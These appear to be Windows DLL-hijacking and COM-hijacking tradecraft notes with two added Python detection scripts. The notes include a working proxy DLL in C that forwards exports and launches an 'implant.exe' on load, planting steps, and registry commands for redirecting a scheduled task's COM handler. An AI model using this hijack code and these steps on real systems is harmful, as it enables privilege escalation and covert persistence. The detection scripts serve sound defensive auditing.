Identify a candidate: a service or scheduled task that runs, or an entry under the \RUN registry key. Copy the executable's home folder, run the executable, and note which DLLs get loaded.
Check icacls on the directory to see whether you can modify the path; modify rights are shown as (M).
Look for a DLL that does not exist in the local path. Procmon can find these: filter on 'Result CONTAINS "NOT FOUND"' and 'Process Name CONTAINS "Application_Name"'.
Additionally, run 'dumpbin /exports original.dll' to see which functions the DLL exports and which libraries are involved. A forwarding pragma (below) is needed for every export so the application keeps working.
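As an added defender-side example (not from the original notes), the following Python script automates the two checks above offline: it takes a Process Monitor CSV export, keeps the DLL opens that ended in NAME NOT FOUND for the process of interest, and joins them with icacls output for the directories involved, flagging any missing DLL whose directory grants Full, Modify or Write rights to Everyone, Users or Authenticated Users. That combination is what needs remediation (tighten the ACL, or ship the DLL so the lookup never reaches a writable directory). The Procmon rows and icacls output are constructed samples; the column names follow Procmon's CSV export, and the list of low-privileged principals is an assumption to adjust per environment.

```python
"""Audit a process for DLL search-order hijack exposure.

Joins a Process Monitor CSV export (DLL opens that ended in NAME NOT FOUND)
with icacls output for the directories those lookups hit. A missing DLL in a
directory that low-privileged principals can write to is a hijack candidate.
"""
import csv
import io
import re
from pathlib import PureWindowsPath

# Principals whose write access on a directory matters for a process that runs
# with higher privileges (assumption: English names; extend per environment).
LOW_PRIV_PRINCIPALS = {"everyone", "builtin\\users", "nt authority\\authenticated users"}
# icacls rights that allow creating or replacing a file in a directory:
# simple F/M/W plus the specific WD (write data / add file) right.
WRITE_RIGHTS = {"F", "M", "W", "WD"}

ACE_RE = re.compile(r"^(?P<principal>[^:]+?):(?P<rights>(?:\([^)]*\))+)$")


def parse_icacls(directory: str, output: str) -> dict[str, set[str]]:
    """Parse `icacls <directory>` output into {principal: {rights}}.

    `directory` must be the exact string passed to icacls: it prefixes the
    first line only, continuation lines are just indented. Deny ACEs carry a
    (DENY) flag and are skipped because they grant nothing."""
    aces: dict[str, set[str]] = {}
    for raw in output.splitlines():
        line = raw.strip()
        if not line or line.startswith("Successfully processed"):
            continue
        if line.lower().startswith(directory.lower()):
            line = line[len(directory):].strip()
        m = ACE_RE.match(line)
        if not m:
            continue
        rights = {r.strip() for grp in re.findall(r"\(([^)]*)\)", m["rights"])
                  for r in grp.split(",")}
        if "DENY" in rights:
            continue
        aces.setdefault(m["principal"], set()).update(rights)
    return aces


def writable_by_low_priv(aces: dict[str, set[str]]) -> list[tuple[str, set[str]]]:
    """(principal, write rights) pairs that let a low-privileged user drop a file."""
    return [(p, r & WRITE_RIGHTS) for p, r in aces.items()
            if p.lower() in LOW_PRIV_PRINCIPALS and r & WRITE_RIGHTS]


def missing_dll_loads(procmon_csv: str, process_name: str) -> list[str]:
    """DLL paths the process tried to open but did not find, in order, deduplicated
    (the 'Result contains NOT FOUND' + 'Process Name' Procmon filter)."""
    seen, paths = set(), []
    for row in csv.DictReader(io.StringIO(procmon_csv)):
        if row["Process Name"].lower() != process_name.lower():
            continue
        if row["Result"] != "NAME NOT FOUND" or not row["Path"].lower().endswith(".dll"):
            continue
        if row["Path"].lower() not in seen:
            seen.add(row["Path"].lower())
            paths.append(row["Path"])
    return paths


def hijack_candidates(procmon_csv: str, process_name: str,
                      icacls_by_dir: dict[str, str]) -> list[dict]:
    """Join missing-DLL lookups with the ACL of their directory; flag writable ones."""
    findings = []
    for path in missing_dll_loads(procmon_csv, process_name):
        directory = str(PureWindowsPath(path).parent)
        output = icacls_by_dir.get(directory)
        if output is None:
            continue  # no icacls capture for this directory
        for principal, rights in writable_by_low_priv(parse_icacls(directory, output)):
            findings.append({"dll": path, "directory": directory,
                             "principal": principal, "rights": sorted(rights)})
    return findings


# --- constructed samples (not a real capture) -------------------------------
PROCMON_CSV = r'''"Time of Day","Process Name","PID","Operation","Path","Result","Detail"
"10:01:02.1234567 AM","App.exe","4120","CreateFile","C:\Program Files\App\winsplhlp.dll","NAME NOT FOUND","Desired Access: Read Attributes"
"10:01:02.1234600 AM","App.exe","4120","CreateFile","C:\Windows\System32\winsplhlp.dll","SUCCESS","Desired Access: Read Data/List Directory"
"10:01:02.1235000 AM","App.exe","4120","CreateFile","C:\Windows\System32\absent.dll","NAME NOT FOUND","Desired Access: Read Attributes"
"10:01:03.0000000 AM","svchost.exe","800","CreateFile","C:\Windows\System32\other.dll","NAME NOT FOUND","Desired Access: Read Attributes"
'''

ICACLS_OUTPUTS = {
    r"C:\Program Files\App": r"""C:\Program Files\App BUILTIN\Administrators:(I)(OI)(CI)(F)
                     NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F)
                     BUILTIN\Users:(OI)(CI)(M)

Successfully processed 1 files; Failed processing 0 files""",
    r"C:\Windows\System32": r"""C:\Windows\System32 NT SERVICE\TrustedInstaller:(F)
                    BUILTIN\Administrators:(RX)
                    BUILTIN\Users:(RX)

Successfully processed 1 files; Failed processing 0 files""",
}

if __name__ == "__main__":
    for f in hijack_candidates(PROCMON_CSV, "App.exe", ICACLS_OUTPUTS):
        print(f"{f['dll']}: {f['principal']} has {f['rights']} on {f['directory']}")
```

With the samples above only winsplhlp.dll in the application folder is reported: absent.dll is also missing, but System32 grants Users read/execute only, so the lookup there is not exploitable.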
Create DLL:
    #include <Windows.h>

    // Forward every export of the original DLL to the renamed copy (winsplhlp.dll)
    // so the application keeps working. Syntax: /export:Name=winsplhlp.Name,@ordinal
    // The first entry is for OpenPrinterA, which is exported at ordinal 0x8F
    // (143 decimal); the decimal ordinal goes after the @.
    // Hex to decimal in python: python -c "print(int(0x8f), int(0x4d), int(0x1d))"
    // (0x8f = 143, 0x4d = 77, 0x1d = 29; take each ordinal from the dumpbin output)
    // Repeat the pragma for every export listed by dumpbin.
    #pragma comment(linker,"/export:DLL_CALL_HERE=winsplhlp.DLL_CALL_HERE,@143")
    #pragma comment(linker,"/export:DLL_CALL_HERE=winsplhlp.DLL_CALL_HERE,@79")
    #pragma comment(linker,"/export:DLL_CALL_HERE=winsplhlp.DLL_CALL_HERE,@29")
    // If the export has no name (NONAME), forward by ordinal using #100
    // (100 = the ordinal).
    #pragma comment(linker,"/export:NONAME=winsplhlp.#100,@100,NONAME")

    void Go(void) {
        // Narrow-character structures to match CreateProcessA below.
        STARTUPINFOA info = { sizeof(info) };
        PROCESS_INFORMATION processInfo;
        CreateProcessA(
            "c:\\Windows\\Tasks\\implant.exe",
            "", NULL, NULL, TRUE, 0, NULL, NULL,
            &info, &processInfo);
    }

    BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved) {
        switch (ul_reason_for_call) {
        case DLL_PROCESS_ATTACH:
            // Runs when the application loads this DLL.
            Go();
            break;
        case DLL_THREAD_ATTACH:
            break;
        case DLL_THREAD_DETACH:
            break;
        case DLL_PROCESS_DETACH:
            break;
        }
        return TRUE;
    }
Copy the new DLL into the application folder under the original DLL's name, and copy the original DLL alongside it renamed to 'winsplhlp.dll' (the name the forwarding pragmas point to).
COM-Based hijacking/proxying:
COM objects are referenced by GUIDs (CLSIDs) and can live on a remote machine. When an application calls into a COM DLL it asks the SCM for the GUID; the SCM queries the local registry, both the machine and the user hive (HKEY_CLASSES_ROOT, backed by \SOFTWARE\CLASSES\CLSID), and loads the DLL if the entry is found. A user can edit the \Software\CLASSES hive under their own user key.
COM objects can also be implemented as EXE files (process loading): the registry is still consulted, the EXE is started as a new process, the COM object lives in that process, and it is called via RPC.
If the object is on a remote machine, the remote SCM is called, again over RPC.
Check scheduled tasks:
schtasks.exe /query /xml > tasks.xml
Within the <Actions></Actions> section look for <ComHandler></ComHandler>, and within <Triggers></Triggers> look for persistence triggers such as logon. Once you have identified a task, query its CLSID:
reg query "HKCR\CLSID\{123123123-1231-2123-1231-2312312312}"
reg query "HKCR\CLSID\{123123123-1231-2123-1231-2312312312}\service"
# or could be in local machine:
reg query "HKLM\Software\Classes\CLSID\{123123123-1231-2123-1231-2312312312}\Service"
# or could be in current user:
reg query "HKCU\Software\Classes\CLSID\{123123123-1231-2123-1231-2312312312}\Service"
# export (reg export needs a file path; the file name here is chosen for this example):
reg export "HKCU\Software\Classes\CLSID\{123123123-1231-2123-1231-2312312312}\Service" C:\Windows\Temp\clsid.reg
Update the exported .reg file so the key points at the hive where the new entry should live, e.g. change 'HKEY_LOCAL_MACHINE' to 'HKEY_CURRENT_USER'; also update the path of the DLL/EXE, save the file, then upload it:
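As an added detection example (not part of the original notes), this Python script performs the scheduled-task COM check above offline: it extracts the ClassId of every <ComHandler> action and the trigger types from `schtasks /query /xml` output, parses `reg export` files taken from HKLM and HKCU, and reports tasks whose CLSID has a registration in the per-user hive together with the machine-hive path it shadows. The task XML, the CLSID and the .reg contents are constructed samples. Two assumptions: the schtasks output is treated as a concatenation of per-task XML documents, and the check reads the InprocServer32 subkey (which holds the DLL path of an in-process server); add other subkeys, such as the Service key queried above, to the suffix list if your tasks register there.

```python
"""Find scheduled tasks whose COM handler CLSID is overridden in the per-user hive.

A <ComHandler> task action instantiates a COM class by CLSID. When the task
runs as a user, HKEY_CLASSES_ROOT resolves the CLSID from the user's
HKCU\Software\Classes before the machine's HKLM\Software\Classes, so a
per-user InprocServer32 entry for a task CLSID is a persistence indicator.
"""
import re
import xml.etree.ElementTree as ET

# --- constructed samples (not real task or registry data) -------------------
TASKS_XML = r'''<?xml version="1.0" encoding="UTF-16"?>
<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo><URI>\Microsoft\Windows\Example\CacheTask</URI></RegistrationInfo>
  <Triggers><LogonTrigger><Enabled>true</Enabled></LogonTrigger></Triggers>
  <Actions Context="Author">
    <ComHandler><ClassId>{0A1B2C3D-0000-4000-8000-00000000C0DE}</ClassId></ComHandler>
  </Actions>
</Task>
<?xml version="1.0" encoding="UTF-16"?>
<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo><URI>\Example\NightlyBackup</URI></RegistrationInfo>
  <Triggers><CalendarTrigger><StartBoundary>2024-01-01T03:00:00</StartBoundary></CalendarTrigger></Triggers>
  <Actions Context="Author"><Exec><Command>C:\Program Files\Backup\backup.exe</Command></Exec></Actions>
</Task>
'''

REG_HKLM = r'''Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0A1B2C3D-0000-4000-8000-00000000C0DE}\InprocServer32]
@="C:\\Windows\\System32\\examplecache.dll"
"ThreadingModel"="Both"
'''

REG_HKCU = r'''Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Classes\CLSID\{0A1B2C3D-0000-4000-8000-00000000C0DE}\InprocServer32]
@="C:\\Users\\alice\\AppData\\Local\\Temp\\examplecache.dll"
"ThreadingModel"="Both"
'''


def _local(tag: str) -> str:
    """Strip the XML namespace from an element tag."""
    return tag.rsplit("}", 1)[-1]


def com_handler_tasks(schtasks_xml: str) -> list[dict]:
    """Return {'uri', 'clsid', 'triggers'} for each task with a ComHandler action.

    schtasks /query /xml emits one XML document per task back to back; split
    on the declaration and parse each one (assumption about the layout)."""
    found = []
    for doc in re.split(r"(?=<\?xml)", schtasks_xml):
        doc = re.sub(r"<\?xml[^>]*\?>", "", doc).strip()
        if not doc:
            continue
        root = ET.fromstring(doc)
        clsids = [e.text.strip().upper() for e in root.iter()
                  if _local(e.tag) == "ClassId" and e.text]
        if not clsids:
            continue
        uri = next((e.text for e in root.iter() if _local(e.tag) == "URI"), "")
        triggers = [_local(t.tag) for trig in root.iter()
                    if _local(trig.tag) == "Triggers" for t in trig]
        found.extend({"uri": uri, "clsid": c, "triggers": triggers} for c in clsids)
    return found


def parse_reg_export(text: str) -> dict[str, dict[str, str]]:
    """Parse `reg export` output into {key (lowercased): {value name: data}}.

    Only string values are decoded ('@' is the default value); .reg files
    double the backslashes inside strings, which is undone here."""
    keys, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].lower()
            keys[current] = {}
        elif current is not None and "=" in line:
            name, _, data = line.partition("=")
            if data.startswith('"') and data.endswith('"'):
                keys[current][name.strip('"')] = data[1:-1].replace("\\\\", "\\")
    return keys


def com_hijack_findings(schtasks_xml: str, reg_exports: list[str]) -> list[dict]:
    """Flag ComHandler tasks whose CLSID has an InprocServer32 key under HKCU."""
    reg: dict[str, dict[str, str]] = {}
    for text in reg_exports:
        reg.update(parse_reg_export(text))
    findings = []
    for task in com_handler_tasks(schtasks_xml):
        suffix = f"\\software\\classes\\clsid\\{task['clsid'].lower()}\\inprocserver32"
        user = reg.get("hkey_current_user" + suffix)
        if user is None:
            continue  # no per-user override: the machine registration is used
        machine = reg.get("hkey_local_machine" + suffix, {})
        findings.append({**task, "user_server": user.get("@"),
                         "machine_server": machine.get("@")})
    return findings


if __name__ == "__main__":
    for f in com_hijack_findings(TASKS_XML, [REG_HKLM, REG_HKCU]):
        print(f"{f['uri']} {f['clsid']} triggers={f['triggers']}")
        print(f"  HKCU server: {f['user_server']} (shadows {f['machine_server']})")
```

Run against real data by feeding the captured tasks.xml and the two .reg exports; a finding whose user-hive path sits under a profile directory (AppData, Temp) while the machine-hive path is in System32 is the pattern to investigate and remove.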